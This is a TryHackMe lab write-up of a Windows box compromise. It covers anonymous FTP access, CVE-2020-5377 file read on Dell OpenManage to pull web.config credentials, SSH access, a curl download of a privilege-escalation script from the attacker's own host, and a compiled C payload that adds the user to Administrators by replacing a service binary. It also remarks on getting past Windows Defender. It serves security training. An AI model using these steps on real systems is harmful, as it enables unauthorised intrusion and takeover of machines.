Hack Smarter Security | TryHackMe Write-up
Hey, I am back with another write-up. Try this room and many more at TryHackMe!!!
NMAP Scan
nmap [IP] -sV -T5
We get five open ports 21, 22, 80 ,1311 and 3389
PORT 21
Anonymous login was allowed and we found two files: 1 text file and 1 png
The text file contains some Credit card information
Port 80 and 1311
First Let’s look at Port 80
Let’s try directory enum
gobuster dir -u [URL] -w /path/to/wordlist
Nothing interesting was found there. Let’s try port 1311
let’s switch to https://IP:1311
Great we are dealing with DELL EMC OPENMANAGE and have a login in front of us, but let’s take a look around first.
About (see footer) tells us that we are dealing with version 9.4.0.2.
Exploit
Found the exploit CVE-2020–5377 at exploit-db.
Take a look at this post to learn more about the vulnerability.
exploit-db script was not working so tried this script.
We are now able to retrieve files on the system. We start with C:\Windows\win.ini. A file that is available and accessible on every Windows system. This allows us to test whether the exploit actually works or not. We know that RDP and SSH are accessible(see Nmap scan), so we are looking for credentials.
A good place for these is usually the web.config of the IIS. We can find the config at
C:\inetpub\wwwroot\application\web.config. We know from our Nmap scan that the HTTP title corresponds to the domain name. Possibly this is the application name. When we call up \inetpub\wwwroot\hacksmartersec\web.config, we get its content and thus the credentials for the user Tyler.
we were able to enter via ssh
we looked for user.txt and found that
We will use this https://github.com/itm4n/PrivescCheck
We can open http server as below on our system
python2 -m SimpleHTTPServer 1234
and curl the script on machine.
curl http://10.9.1.214:1234/PrivescCheck.ps1 -o PrivescCheck.ps1
use the below cmd to run the script. It will take some time to run the script.
powershell -ep bypass -c “. .\PrivescCheck.ps1; Invoke-PrivescCheck”
We find a very likely vulnerability, rated as high. The spoofer-scheduler service can be started and stopped by a normal user. The service runs under the LocalSystem. If we now replace the executable of the service, e.g. with a reverse shell or an executable that creates an admin account for us, we can escalate our privileges.
We confirm that we can write to C:\Program Files(x86)\Spoofer. We now need a reverse shell executable that is not recognized by Windows Defender. A simple msfvenom payload gets easily detected and deleted.
Instead, I chose to create an executable that will add the Tyler user to the Administrators local group.
Writing a very simple C code that does this.
#include <stdlib.h>
int main() {system(“cmd.exe /c net localgroup Administrators tyler /add”);
return 0;
}
Now Compiling it into an executable for Windows.
x86_64-w64-mingw32-gcc-win32 payload.c -o payload.exe
Now we will stop the scheduler
sc stop spoofer-scheduler
Now we will rename the original exe and upload our exe and execute it.
After a re-login, i was part of the administrator group
We were able to read Hacking-targets.txt
The room was nice I enjoyed doing this room
Happy Hacking!